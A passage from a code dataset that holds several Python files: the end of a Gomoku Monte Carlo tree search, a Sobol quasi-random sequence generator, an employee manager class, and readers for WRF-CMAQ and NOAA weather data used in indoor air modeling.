\"black\":\n is_empty = board.is_empty\n is_our = board.is_black\n is_enemy = board.is_white\n else:\n is_empty = board.is_empty\n is_our = board.is_white\n is_enemy = board.is_black\n\n x, y = action\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (-1, -1), (-1, 1), (1, -1)]\n weight = 0\n\n for dx, dy in directions:\n if is_our(x + dx, y + dy):\n weight += values['?*1?']\n if is_our(x + dx, y + dy) and is_our(x + 2 * dx, y + 2 * dy):\n weight += values['?*11?']\n if is_our(x + dx, y + dy) and is_our(x + 2 * dx, y + 2 * dy) and is_our(x + 3 * dx, y + 3 * dy):\n weight += values['?*111?']\n if is_our(x + dx, y + dy) and is_our(x + 2 * dx, y + 2 * dy) and is_our(x + 3 * dx, y + 3 * dy) and is_our(\n x + 4 * dx, y + 4 * dy):\n weight += values['?*1111?']\n\n if is_enemy(x + dx, y + dy):\n weight += values['?*2?']\n if is_enemy(x + dx, y + dy) and is_enemy(x + 2 * dx, y + 2 * dy):\n weight += values['?*22?']\n if is_enemy(x + dx, y + dy) and is_enemy(x + 2 * dx, y + 2 * dy) and is_enemy(x + 3 * dx, y + 3 * dy):\n weight += values['?*222?']\n if is_enemy(x + dx, y + dy) and \\\n is_enemy(x + 2 * dx, y + 2 * dy) and is_enemy(x + 3 * dx, y + 3 * dy) \\\n and is_enemy(x + 4 * dx, y + 4 * dy):\n weight += values['?*2222?']\n\n return weight\n\ndef UCT(rootstate, maxtime, verbose=False):\n \"\"\" Conduct a UCT search for itermax iterations starting from rootstate.\n Return the best move from the rootstate.\n Assumes 2 alternating players (player 1 starts), with game results in the range [0.0, 1.0].\"\"\"\n\n rootnode = Node(state=rootstate)\n end_time = time.time() + maxtime\n while time.time() < end_time:\n #for i in range(itermax):\n node = rootnode\n state = rootstate.Clone()\n\n # Select\n while node.untriedMoves == [] and node.childNodes != []: # node is fully expanded and non-terminal\n node = node.UCTSelectChild()\n state.DoMove(node.move)\n\n # Expand\n if node.untriedMoves != []: # if we can expand (i.e. state/node is non-terminal)\n m = random.choice(node.untriedMoves)\n state.DoMove(m)\n node = node.AddChild(m, state) # add child and descend tree\n\n # Rollout - this can often be made orders of magnitude quicker using a state.GetRandomMove() function\n while state.GetMoves() != []: # while state is non-terminal\n state.DoMove(random.choice(state.GetMoves()))\n\n # Backpropagate\n while node != None: # backpropagate from the expanded node and work back to the root node\n node.Update(state.GetResult(\n node.playerJustMoved)) # state is terminal. Update node with result from POV of node.playerJustMoved\n node = node.parentNode\n\n # Output some information about the tree - can be omitted\n if (verbose):\n print(rootnode.TreeToString(0))\n else:\n print(rootnode.ChildrenToString())\n\n return sorted(rootnode.childNodes, key=lambda c: c.visits)[-1].move # return the move that was most visited\n","sub_path":"ai/group_23.py","file_name":"group_23.py","file_ext":"py","file_size_in_byte":12901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"576263269","text":"from .._discrete_distribution import DiscreteDistribution\nfrom ...util import ParameterError, ParameterWarning\nfrom ..c_lib import c_lib\nimport ctypes\nfrom os.path import dirname, abspath, isfile\nfrom numpy import *\nimport warnings\n\n\nclass Sobol(DiscreteDistribution):\n \"\"\"\n Quasi-Random Sobol nets in base 2.\n \n >>> s = Sobol(2,seed=7)\n >>> s\n Sobol (DiscreteDistribution Object)\n dimension 2^(1)\n randomize 1\n graycode 0\n seed [61615 58564]\n mimics StdUniform\n dim0 0\n >>> s.gen_samples(4)\n array([[0.783, 0.173],\n [0.128, 0.816],\n [0.72 , 0.664],\n [0.316, 0.334]])\n >>> s.set_dimension(3)\n >>> s.gen_samples(n_min=4,n_max=8)\n array([[0.882, 0.932, 0.573],\n [0.035, 0.071, 0.379],\n [0.569, 0.418, 0.036],\n [0.474, 0.593, 0.982]])\n >>> Sobol(dimension=2,randomize=False,graycode=True).gen_samples(n_min=2,n_max=4)\n array([[0.75, 0.25],\n [0.25, 0.75]])\n >>> Sobol(dimension=2,randomize=False,graycode=False).gen_samples(n_min=2,n_max=4)\n array([[0.25, 0.75],\n [0.75, 0.25]])\n \n References:\n\n [1] Marius Hofert and Christiane Lemieux (2019). \n qrng: (Randomized) Quasi-Random Number Generators. \n R package version 0.0-7.\n https://CRAN.R-project.org/package=qrng.\n\n [2] Faure, Henri, and Christiane Lemieux. \n “Implementation of Irreducible Sobol' Sequences in Prime Power Bases.” \n Mathematics and Computers in Simulation 161 (2019): 13–22. Crossref. Web.\n\n [3] F.Y. Kuo & D. Nuyens.\n Application of quasi-Monte Carlo methods to elliptic PDEs with random diffusion coefficients \n - a survey of analysis and implementation, Foundations of Computational Mathematics, \n 16(6):1631-1696, 2016.\n springer link: https://link.springer.com/article/10.1007/s10208-016-9329-5\n arxiv link: https://arxiv.org/abs/1606.06613\n \n [4] D. Nuyens, `The Magic Point Shop of QMC point generators and generating\n vectors.` MATLAB and Python software, 2018. Available from\n https://people.cs.kuleuven.be/~dirk.nuyens/\n\n [5] Paszke, A., Gross, S., Massa, F., Lerer, A., Bradbury, J., Chanan, G., … Chintala, S. \n (2019). PyTorch: An Imperative Style, High-Performance Deep Learning Library. \n In H. Wallach, H. Larochelle, A. Beygelzimer, F. d extquotesingle Alch'e-Buc, E. Fox, & R. Garnett (Eds.), \n Advances in Neural Information Processing Systems 32 (pp. 8024–8035). Curran Associates, Inc. \n Retrieved from http://papers.neurips.cc/paper/9015-pytorch-an-imperative-style-high-performance-deep-learning-library.pdf\n\n [6] I.M. Sobol', V.I. Turchaninov, Yu.L. Levitan, B.V. Shukhman: \n \"Quasi-Random Sequence Generators\" Keldysh Institute of Applied Mathematics, \n Russian Acamdey of Sciences, Moscow (1992).\n\n [7] Sobol, Ilya & Asotsky, Danil & Kreinin, Alexander & Kucherenko, Sergei. (2011). \n Construction and Comparison of High-Dimensional Sobol' Generators. Wilmott. \n 2011. 10.1002/wilm.10056. \n\n [8] Paul Bratley and Bennett L. Fox. 1988. \n Algorithm 659: Implementing Sobol's quasirandom sequence generator. \n ACM Trans. Math. Softw. 14, 1 (March 1988), 88–100. \n DOI:https://doi.org/10.1145/42288.214372\n \"\"\"\n \n parameters = ['dimension','randomize','graycode','seed','mimics','dim0']\n\n def __init__(self, dimension=1, randomize='LMS', graycode=False, seed=None, z_path=None, dim0=0):\n \"\"\"\n Args:\n dimension (int): dimension of samples\n randomize (bool): If True, apply digital shift to generated samples.\n Note: Non-randomized Sobol' sequence includes the origin.\n graycode (bool): indicator to use graycode ordering (True) or natural ordering (False)\n seeds (list): int seed of list of seeds, one for each dimension.\n z_path (str): path to generating matricies. \n z_path sould be formatted like `gen_mat.21201.32.msb.npy` with name.d_max.m_max.msb_or_lsb.npy\n dim0 (int): first dimension\n \"\"\"\n # initialize c code\n self.get_unsigned_long_long_size_cf = c_lib.get_unsigned_long_long_size\n self.get_unsigned_long_long_size_cf.argtypes = []\n self.get_unsigned_long_long_size_cf.restype = ctypes.c_uint8\n self.get_unsigned_long_size_cf = c_lib.get_unsigned_long_size\n self.get_unsigned_long_size_cf.argtypes = []\n self.get_unsigned_long_size_cf.restype = ctypes.c_uint8\n\n self.sobol_cf = c_lib.sobol\n self.sobol_cf.argtypes = [\n ctypes.c_ulong, # n\n ctypes.c_uint32, # d\n ctypes.c_ulong, # n0\n ctypes.c_uint32, # d0\n ctypes.c_uint8, # randomize\n ctypes.c_uint8, # graycode\n ctypeslib.ndpointer(ctypes.c_uint64, flags='C_CONTIGUOUS'), # seeds\n ctypeslib.ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'), # x (result)\n ctypes.c_uint32, # d_max\n ctypes.c_uint32, # m_max\n ctypeslib.ndpointer(ctypes.c_uint64, flags='C_CONTIGUOUS'), # z (generating matrix)\n ctypes.c_uint8] # msb\n # set parameters\n self.sobol_cf.restype = ctypes.c_uint8\n self.set_dimension(dimension)\n self.set_seed(seed)\n self.set_randomize(randomize)\n self.set_graycode(graycode)\n self.set_dim0(dim0)\n # set generating matrix\n if not z_path:\n self.d_max = 21201\n self.m_max = 32\n self.msb = True\n self.z = load(dirname(abspath(__file__))+'/generating_matricies/sobol_mat.21201.32.msb.npy').astype(uint64)\n else:\n if not isfile(z_path):\n raise ParameterError('z_path `' + z_path + '` not found. ')\n self.z = load(z_path).astype(uint64)\n f = z_path.split('/')[-1]\n f_lst = f.split('.')\n self.d_max = int(f_lst[1])\n self.m_max = int(f_lst[2])\n msblsb = f_lst[3].lower()\n if msblsb == 'msb':\n self.msb = True\n elif msblsb == 'lsb':\n self.msb = False\n else:\n msg = '''\n z_path sould be formatted like `sobol_mat.21201.32.msb.npy`\n with name.d_max.m_max.msb_or_lsb.npy\n '''\n raise ParameterError(msg)\n self.errors = {\n 1: 'requires 32 bit precision but system has unsigned int with < 32 bit precision.',\n 2: 'using natural ordering (graycode=0) where n0 and/or (n0+n) is not 0 or a power of 2 is not allowed.',\n 3: 'Exceeding max samples (2^%d) or max dimensions (%d).'%(self.m_max,self.d_max)}\n self.low_discrepancy = True\n self.mimics = 'StdUniform'\n super(Sobol,self).__init__() \n\n def gen_samples(self, n=None, n_min=0, n_max=8, warn=True):\n \"\"\"\n Generate samples\n\n Args:\n n (int): if n is supplied, generate from n_min=0 to n_max=n samples. \n Otherwise use the n_min and n_max explicitly supplied as the following 2 arguments\n n_min (int): Starting index of sequence.\n n_max (int): Final index of sequence.\n\n Returns:\n ndarray: (n_max-n_min) x d (dimension) array of samples\n \"\"\"\n if n:\n n_min = 0\n n_max = n\n if n_min == 0 and self.randomize==False and warn:\n warnings.warn(\"Non-randomized AGS Sobol sequence includes the origin\",ParameterWarning)\n if len(self.seed) != self.dimension:\n self.set_seed(self.seed)\n n = int(n_max-n_min)\n x = zeros((n,self.dimension), dtype=double)\n rc = self.sobol_cf(n, self.dimension, int(n_min), self.dim0, self.randomize, self.graycode, \\\n self.seed, x, self.d_max, self.m_max, self.z, self.msb)\n if rc!= 0:\n raise ParameterError(self.errors[rc])\n return x\n \n def set_seed(self, seeds):\n \"\"\"\n Reset the seeds\n\n Args:\n seeds (int/list/None): new seeds\n \"\"\"\n if isinstance(seeds,int) or isinstance(seeds,uint32) or isinstance(seeds,uint64):\n random.seed(seeds)\n self.seed = random.randint(0, 100000, size=self.dimension, dtype=uint64)\n elif isinstance(seeds,list) or isinstance(seeds,ndarray):\n seeds = array(seeds)\n l = len(seeds)\n if l == self.dimension:\n self.seed = seeds\n elif l < self.dimension:\n self.seed = hstack((seeds,random.randint(0, 100000, size=self.dimension-l, dtype=uint64)))\n else: # l > self.dimension\n self.seed = seeds[:self.dimension]\n elif seeds==None: # assume seed==None\n random.seed(None)\n self.seed = random.randint(0, 100000, size=self.dimension, dtype=uint64)\n else:\n msg = \"Sobol' seed must be an int, list of ints, or None.\"\n raise ParameterError(msg)\n self.seed = array(self.seed,dtype=uint64)\n \n def set_dimension(self, dimension):\n \"\"\"\n Reset the dimension\n\n Args:\n dimension (int): new dimension\n \"\"\"\n self.dimension = dimension\n\n def set_randomize(self, randomize):\n \"\"\"\n Reset the randomization\n\n Args:\n randomize (str): randomization type. Either \n 'LMS': linear matrix scramble with digital shift\n 'DS': just the digital shift\n \"\"\"\n if randomize==None or (isinstance(randomize,str) and (randomize.upper()=='NONE' or randomize.upper=='No')):\n self.randomize = 0\n elif isinstance(randomize,bool):\n self.randomize = int(randomize)\n elif randomize.upper() in [\"LMS\",\"LINEAR MATRIX SCRAMBLE\"]:\n self.randomize = 1\n elif randomize.upper() in [\"DS\",\"DIGITAL SHIFT\"]:\n self.randomize = 2\n else:\n msg = '''\n Sobol' randomize should be either \n 'LMS' for Linear Matrix Scramble or \n 'DS' for Digital Shift. \n '''\n raise ParameterError(msg)\n \n def set_graycode(self, graycode):\n \"\"\"\n Reset the graycode\n\n Args:\n graycode (bool): use graycode?\n \"\"\"\n self.graycode = graycode\n \n def set_dim0(self, dim0):\n \"\"\"\n Reset the first dimension\n\n Args:\n dim0 (int): first dimension\n \"\"\"\n self.dim0 = dim0\n","sub_path":"qmcpy/discrete_distribution/sobol/sobol.py","file_name":"sobol.py","file_ext":"py","file_size_in_byte":10796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"207169169","text":"\"\"\"\n Managers(manager.py):\n Purpose: views and edits information about employees reporting to him/her\n by: Michael Edegware\n Date: 6/6/2017\n\"\"\"\n# import objects of admin and employee\nfrom admin import Admin\nimport database\nfrom employee import Employee\n\n\n\nclass Manager:\n # default constructor\n def __init__(self, manager_id, manager_name, employees_ids=[]):\n self.manager_id = manager_id\n self.manager_name = manager_name\n self.employee_ids = employees_ids\n\n def __repr__(self):\n return \"Manager's name:{}\\nNumber of employee's: {}\".format(self.manager_name,\n int(len(self.employee_ids)))\n\n def __str__(self):\n return \"Manager's name:{}\\nNumber of employee's: {}\".format(self.manager_name,\n int(len(self.employee_ids)))\n\n # set manager to self in the employee, adds employee to the list of employees and\n # initiate add_id at admin and adds the employee to database\n @staticmethod\n def add_employee(self, employee, admin, c, conn):\n if admin.is_manager(admin, self.manager_id, employee.manager_name):\n id_ = employee.id_\n inp = id_\n while True:\n if Admin.add_id(admin, inp, employee, \"employee\"):\n break\n inp = str(input(\"Id is already taken, enter a new one: \"))\n id_ = inp\n employee.id_ = id_\n database.insert_employee(conn, c, employee)\n self.employee_ids.append(id_)\n\n # removes the instance of employee from database\n @staticmethod\n def remove_employee(self, employee, admin, c, conn):\n if admin.is_manager(admin, self.manager_id, self.manager_name):\n id_ = employee.id_\n if Admin.remove_id(admin, id_, employee, \"employee\"):\n database.remove_emp(conn, c, id_)\n self.employee_ids.remove(id_)\n\n # set current_salary to amount\n @staticmethod\n def set_salary(self, amount, employee, admin, c, conn):\n if admin.is_manager(admin, self.manager_id, self.manager_name):\n id_ = employee.id_\n if database.get_information(c, employee.id_) != None:\n employee.salary_history.append(employee.current_salary)\n employee.current_salary = amount\n database.remove_emp(conn, c, id_)\n database.insert_employee(conn, c, employee)\n\n # deduct the number of vacation left by one\n @staticmethod\n def deduct_vacation(self, employee, admin, c, conn):\n if admin.is_manager(admin, self.manager_id, self.manager_name):\n if database.get_information(c, employee.id_) != None:\n id_ = employee.id_\n employee.vacation_balance -= 1\n database.remove_emp(conn, c, id_)\n database.insert_employee(conn, c, employee)\n\n # updates the employee’s annual bonus.\n @staticmethod\n def update_bonus(self, amount, employee, admin,c, conn):\n if admin.is_manager(admin, self.manager_id, self.manager_name):\n id_ = employee.id_\n if database.get_information(c, employee.id_) != None:\n employee.annual_bonus = amount\n database.remove_emp(conn, c, id_)\n database.insert_employee(conn, c, employee)\n\n\n","sub_path":"python_exercise/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"392219472","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 30 14:41:45 2017\n\n@author: Von P. Walden, Washington State University\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nfrom datetime import datetime, timedelta\n\ndef readHouseWeatherData(filename):\n \"\"\"\n This function reads data from a CSV file into a pandas dataframe, df.\n The dataframe can then be written to a CONTAM weather file using function,\n writeContamWeatherFile. \"filename\" should be an absolute filename with a \n directory and a filename.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 8 Jul 2019\n \"\"\"\n\n # Read in the data from the csv file\n wth = pd.read_csv(filename, \n parse_dates=[0], \n skiprows=2, \n names=['time', 'Pb', 'Ta', 'RH', 'Wd', 'Ws'], \n index_col='time')\n wth = wth.replace(r'^\\s+$', np.nan, regex=True) # Replace any whitespace/empty variables with nan\n wth = wth.apply(pd.to_numeric) # convert all columns of DataFrame\n wth.Pb = wth.Pb * 100. # Convert from mbar to Pa\n wth.Ta = wth.Ta + 273.15 # Convert from deg C to K\n\n # Conversion from relative humidity to mixing ratio\n # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n A = 6.116441\n m = 7.591386\n Tn = 240.7263\n es = A*10**(m*(wth.Ta.values-273.15)/(wth.Ta.values-273.15+Tn))\n ws = 0.622 * (es/wth.Pb.values)\n w = wth.RH.values * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n\n # Update the data frame with mixing ratios.\n wth['Hr'] = w\n wth.drop(columns = ['RH'], inplace=True)\n \n # Resample the dataframe to 30-minute time steps.\n wth = wth.resample('30T').mean()\n\n return wth\n\ndef readHouseContaminantData(houseDirectory):\n \"\"\"\n This function reads data from CSV files into pandas dataframes, rack,\n pm25 and ptrms. The dataframe can then be written to a CONTAM ctm file \n using function, writeContamWeatherFile. \"houseDirectory\" is the directory \n that contains the outdoor_rack-Table 1.csv, PM2.5-Table 1.csv and \n PTR-MS-Table 1.csv files for the desired house and season.\n \n The data are accessed from the dataframe, df, like:\n\n rack['CO2']\n pm25['PM2.5']\n ptrms['Formaldehyde']\n\n Note that the dataframes provide a multi-index by which one\n can determine both the type of measurements and the units.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 18 August 2019\n Updated: 24 August 2019 - Minor changes to how data is returned.\n \"\"\" \n rack = pd.read_csv(houseDirectory+'outdoor_rack-Table 1.csv', header=[0, 1], parse_dates=True, index_col=[0], skipinitialspace=True)\n pm25 = pd.read_csv(houseDirectory+'PM2.5-Table 1.csv', header=[0, 1], parse_dates=True, index_col=[0], skipinitialspace=True)\n ptrms = pd.read_csv(houseDirectory+'PTR-MS-Table 1.csv', header=[0, 1], parse_dates=True, index_col=[0], skipinitialspace=True)\n \n return rack, pm25, ptrms\n\ndef readWRF_CMAQfile(gridFile, dataFile, lat, lon, vrs, eqs, wthFlag):\n \"\"\"\n This function reads data from a WRF CMAQ data file into pandas dataframes,\n ctm and wth. The dataframes can then be written to CONTAM contaminant and \n weather files using functions, writeContamSpeciesFile and \n writeContamWeatherFile.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 2 Jun 2017\n Updated: 25 Feb 2019 - Simplified original code created by Kevin Toombs.\n \"\"\" \n # Open the WRF GRIDCRO2D file to determine the WRF pixel for lat/lon.\n GRID = xr.open_dataset(gridFile)\n ilat, ilon = find_WRF_pixel(GRID.LAT[0,0,:,:].values,GRID.LON[0,0,:,:].values,lat,lon)\n # Open WRF-CMAQ data file.\n print('Reading: ', dataFile)\n DATA = xr.open_dataset(dataFile)\n # Create a datetime index.\n datestr = str(DATA.SDATE)\n date = datetime(int(datestr[0:4]),1,1) + timedelta(int(datestr[4:])-1)\n time = [date + timedelta(hours=float(t)) for t in DATA.TSTEP]\n #\n # ............................... CONTAMINANT DATA ............................\n #\n # Create a pandas dataframe with contaminant variables.\n ctm = pd.DataFrame({},index=time)\n #ctm = ctm.set_index(pd.DatetimeIndex(ctm.index))\n \n for x in range(len(vrs)):\n vr = vrs.values[x]\n eq = eqs.values[x]\n dat = DATA[vr].values[:,0,ilat,ilon]\n \n #print(eq)\n if(eq[-1] == 'S'):\n air = DATA['AIR_DENS'].values[:,0,ilat,ilon]\n dat = dat/1000000000/air\n #dat.apply(lambda x: x/1000000000/AIR_DENS)\n else:\n pass\n split_eq = eq.split('/')\n mid_split = split_eq[1].split('*')\n base = float(mid_split[0])\n snd = float(mid_split[1])\n thrd = float(split_eq[2])\n dat = dat / base * snd / thrd\n \n \n ctm[vr] = dat\n\n # ........................... WEATHER DATA ............................\n #\n # Read contaminat data from WRF-CMAQ data file.\n if(wthFlag):\n if('AIR_DENS' in DATA):\n T = DATA.SFC_TMP.values[:,0,ilat,ilon] + 273.15 # in K\n P = DATA.AIR_DENS.values[:,0,ilat,ilon]*287.0*T\n wspd = DATA.WSPD10.values[:,0,ilat,ilon]\n wdir = DATA.WDIR10.values[:,0,ilat,ilon]\n # Conversion from relative humidity to mixing ration \n # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n A = 6.116441\n m = 7.591386\n Tn = 240.7263\n es = A*10**(m*(T-273.15)/(T-273.15+Tn))\n ws = 0.622 * (es/P)\n w = DATA.RH.values[:,0,ilat,ilon] * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n \n # Create a pandas dataframe with meteorological variables.\n wth = pd.DataFrame({'Ta':T, \n 'Pb':P,\n 'Ws':wspd,\n 'Wd':wdir,\n 'Hr':w},\n index=time)\n else:\n wth = pd.DataFrame({})\n \n GRID.close()\n DATA.close()\n return ctm, wth\n\ndef find_WRF_pixel(latvar,lonvar,lat0,lon0):\n # Read latitude and longitude from file into numpy arrays\n # Renamed findWRFpixel from original function, naive_fast, written by Vikram Ravi.\n latvals = latvar[:]\n lonvals = lonvar[:]\n dist_sq = (latvals-lat0)**2 + (lonvals-lon0)**2\n minindex_flattened = dist_sq.argmin() # 1D index of min element\n iy_min,ix_min = np.unravel_index(minindex_flattened, latvals.shape)\n return int(iy_min),int(ix_min)\n\ndef readWRF_CMAQfile(gridFile, dataFile, lat, lon, vrs, eqs, wthFlag):\n \"\"\"\n This function reads data from a WRF CMAQ data file into pandas dataframes,\n ctm and wth. The dataframes can then be written to CONTAM contaminant and \n weather files using functions, writeContamSpeciesFile and \n writeContamWeatherFile.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 2 Jun 2017\n Updated: 25 Feb 2019 - Simplified original code created by Kevin Toombs.\n \"\"\" \n # Open the WRF GRIDCRO2D file to determine the WRF pixel for lat/lon.\n GRID = xr.open_dataset(gridFile)\n ilat, ilon = find_WRF_pixel(GRID.LAT[0,0,:,:].values,GRID.LON[0,0,:,:].values,lat,lon)\n # Open WRF-CMAQ data file.\n print('Reading: ', dataFile)\n DATA = xr.open_dataset(dataFile)\n # Create a datetime index.\n datestr = str(DATA.SDATE)\n date = datetime(int(datestr[0:4]),1,1) + timedelta(int(datestr[4:])-1)\n time = [date + timedelta(hours=float(t)) for t in DATA.TSTEP]\n #\n # ............................... CONTAMINANT DATA ............................\n #\n # Create a pandas dataframe with contaminant variables.\n ctm = pd.DataFrame({},index=time)\n #ctm = ctm.set_index(pd.DatetimeIndex(ctm.index))\n \n for x in range(len(vrs)):\n vr = vrs.values[x]\n eq = eqs.values[x]\n dat = DATA[vr].values[:,0,ilat,ilon]\n \n #print(eq)\n if(eq[-1] == 'S'):\n air = DATA['AIR_DENS'].values[:,0,ilat,ilon]\n dat = dat/1000000000/air\n #dat.apply(lambda x: x/1000000000/AIR_DENS)\n else:\n pass\n split_eq = eq.split('/')\n mid_split = split_eq[1].split('*')\n base = float(mid_split[0])\n snd = float(mid_split[1])\n thrd = float(split_eq[2])\n dat = dat / base * snd / thrd\n \n \n ctm[vr] = dat\n\n # ........................... WEATHER DATA ............................\n #\n # Read contaminat data from WRF-CMAQ data file.\n if(wthFlag):\n if('AIR_DENS' in DATA):\n T = DATA.SFC_TMP.values[:,0,ilat,ilon] + 273.15 # in K\n P = DATA.AIR_DENS.values[:,0,ilat,ilon]*287.0*T\n wspd = DATA.WSPD10.values[:,0,ilat,ilon]\n wdir = DATA.WDIR10.values[:,0,ilat,ilon]\n # Conversion from relative humidity to mixing ration \n # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n A = 6.116441\n m = 7.591386\n Tn = 240.7263\n es = A*10**(m*(T-273.15)/(T-273.15+Tn))\n ws = 0.622 * (es/P)\n w = DATA.RH.values[:,0,ilat,ilon] * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n \n # Create a pandas dataframe with meteorological variables.\n wth = pd.DataFrame({'Ta':T, \n 'Pb':P,\n 'Ws':wspd,\n 'Wd':wdir,\n 'Hr':w},\n index=time)\n else:\n wth = pd.DataFrame({})\n \n GRID.close()\n DATA.close()\n return ctm, wth\n\ndef readNOAA_ISH(USAF, WBAN, year):\n \"\"\"This function reads data from NOAA ISH data files for U.S.\n cities used for CONTAM modeling in the EPA indoor air quality\n project.\n \n Input:\n USAF - USAF station identifier (as a string)\n WBAN - WBAN station identifier (as a string)\n year - Desired year, e.g., 2010 (as an integer)\n\n Written by Von P. Walden, Washington State University\n 12 Nov 2017\n\n \"\"\"\n \"\"\"\n isd-history-IAQ.csv\n \"CITY\",\"USAF\",\"WBAN\",\"STATION NAME\",\"CTRY\",\"STATE\",\"ICAO\",\"LAT\",\"LON\",\"ELEV(M)\",\"BEGIN\",\"END\"\n \"Chicago\",\"725300\",\"94846\",\"CHICAGO O'HARE INTERNATIONAL AIRPORT\",\"US\",\"IL\",\"KORD\",\"+41.995\",\"-087.934\",\"+0201.8\",\"19461001\",\"20171107\"\n \"Cincinnati\",\"724210\",\"93814\",\"CINCINNATI/NORTHERN KENTUCKY INTL AP\",\"US\",\"KY\",\"KCVG\",\"+39.044\",\"-084.672\",\"+0269.1\",\"19730101\",\"20171107\"\n \"Nashville\",\"723270\",\"13897\",\"NASHVILLE INTERNATIONAL AIRPORT\",\"US\",\"TN\",\"KBNA\",\"+36.119\",\"-086.689\",\"+0182.9\",\"19510101\",\"20171108\"\n \"Birmingham\",\"722280\",\"13876\",\"BIRMINGHAM INTERNATIONAL AIRPORT\",\"US\",\"AL\",\"KBHM\",\"+33.566\",\"-086.745\",\"+0187.5\",\"19420801\",\"20171107\"\n \"NewYork\",\"725030\",\"14732\",\"LA GUARDIA AIRPORT\",\"US\",\"NY\",\"KLGA\",\"+40.779\",\"-073.880\",\"+0003.4\",\"19730101\",\"20171107\"\n \"Buffalo\",\"725280\",\"14733\",\"BUFFALO NIAGARA INTERNATIONAL AP\",\"US\",\"NY\",\"KBUF\",\"+42.941\",\"-078.736\",\"+0218.2\",\"19420201\",\"20171107\"\n \"Phoenix\",\"722780\",\"23183\",\"PHOENIX SKY HARBOR INTL AIRPORT\",\"US\",\"AZ\",\"KPHX\",\"+33.428\",\"-112.004\",\"+0337.4\",\"19730101\",\"20171107\"\n \"Denver\",\"725650\",\"03017\",\"DENVER INTERNATIONAL AIRPORT\",\"US\",\"CO\",\"KDEN\",\"+39.833\",\"-104.658\",\"+1650.2\",\"19940718\",\"20171107\"\n \"Boston\",\"725090\",\"14739\",\"GEN E L LOGAN INTERNATIONAL AIRPORT\",\"US\",\"MA\",\"KBOS\",\"+42.361\",\"-071.010\",\"+0003.7\",\"19431121\",\"20171107\"\n \"Worcester\",\"725100\",\"94746\",\"WORCESTER REGIONAL AIRPORT\",\"US\",\"MA\",\"KORH\",\"+42.271\",\"-071.873\",\"+0304.8\",\"20100801\",\"20171107\"\n \"LosAngeles\",\"722950\",\"23174\",\"LOS ANGELES INTERNATIONAL AIRPORT\",\"US\",\"CA\",\"KLAX\",\"+33.938\",\"-118.389\",\"+0029.6\",\"19440101\",\"20171107\"\n \"Seattle\",\"727930\",\"24233\",\"SEATTLE-TACOMA INTERNATIONAL AIRPORT\",\"US\",\"WA\",\"KSEA\",\"+47.444\",\"-122.314\",\"+0112.8\",\"19480101\",\"20171107\"\n \"Miami\",\"722020\",\"12839\",\"MIAMI INTERNATIONAL AIRPORT\",\"US\",\"FL\",\"KMIA\",\"+25.791\",\"-080.316\",\"+0008.8\",\"19730101\",\"20171107\"\n \"WashingtonDC\",\"724030\",\"93738\",\"WASHINGTON DULLES INTERNATIONAL AP\",\"US\",\"VA\",\"KIAD\",\"+38.935\",\"-077.447\",\"+0088.4\",\"19730101\",\"20171107\"\n \"Atlanta\",\"722190\",\"13874\",\"HARTSFIELD-JACKSON ATLANTA INTL AP\",\"US\",\"GA\",\"KATL\",\"+33.630\",\"-084.442\",\"+0307.9\",\"19730101\",\"20171108\"\n \"Minneapolis\",\"726580\",\"14922\",\"MINNEAPOLIS-ST PAUL INTERNATIONAL AP\",\"US\",\"MN\",\"KMSP\",\"+44.883\",\"-093.229\",\"+0265.8\",\"19450101\",\"20171107\"\n \"StLouis\",\"724340\",\"13994\",\"LAMBERT-ST LOUIS INTERNATIONAL AP\",\"US\",\"MO\",\"KSTL\",\"+38.753\",\"-090.374\",\"+0161.9\",\"19730101\",\"20171107\"\n \"Dallas\",\"722590\",\"03927\",\"DALLAS/FT WORTH INTERNATIONAL AP\",\"US\",\"TX\",\"KDFW\",\"+32.898\",\"-097.019\",\"+0170.7\",\"19730101\",\"20171107\"\n \"CorpusChristi\",\"722510\",\"12924\",\"CORPUS CHRISTI INTERNATIONAL AIRPORT\",\"US\",\"TX\",\"KCRP\",\"+27.774\",\"-097.512\",\"+0013.4\",\"19460801\",\"20171107\"\n \"\"\"\n\n def pressureCorrection(Ps, Hstn, Tstn):\n \"\"\"Calculate the station pressure in hPa from the sea-level pressure\n (Ps) and the station temperature (Tstn). The correction comes from\n http://www.weather.gov/media/epz/wxcalc/stationPressure.pdf. This\n correction was quickly checked against the hypsometric equation and was\n shown to be adequate; see pressureCorrectionTest.py.\n \n Inputs:\n Hstn - elevation (height) of weather station (meters)\n Ps - sea-level pressure in Pa\n Tstn - temperature measured at the weather station (K)\n \n Output:\n Atmospheric pressure at the weather station\n \n Written by Von P. Walden, Washington State University\n 19 November 2017\n \"\"\"\n Lrate = 0.0065*Hstn # LRate is the approximate lapse rate (K m-1)\n return Ps*((Tstn - Lrate)/Tstn)**5.2561\n \n # NOAA ISH parser comes from:\n # https://github.com/haydenth/ish_parser\n from ish_parser import ish_parser\n import pandas as pd\n import numpy as np\n \n # Construct filename of the desired data and read entire file.\n fn = '/Volumes/vonw/data/iaq/NCDC/ish/3505v2' + USAF + '-' + WBAN + str(year) + '.op'\n f = open(fn)\n content = f.read()\n f.close()\n \n # Read the observations from the desired file.\n wf = ish_parser()\n wf.loads(content)\n obs = wf.get_observations()\n\n # Create a datetime index.\n #\n time = 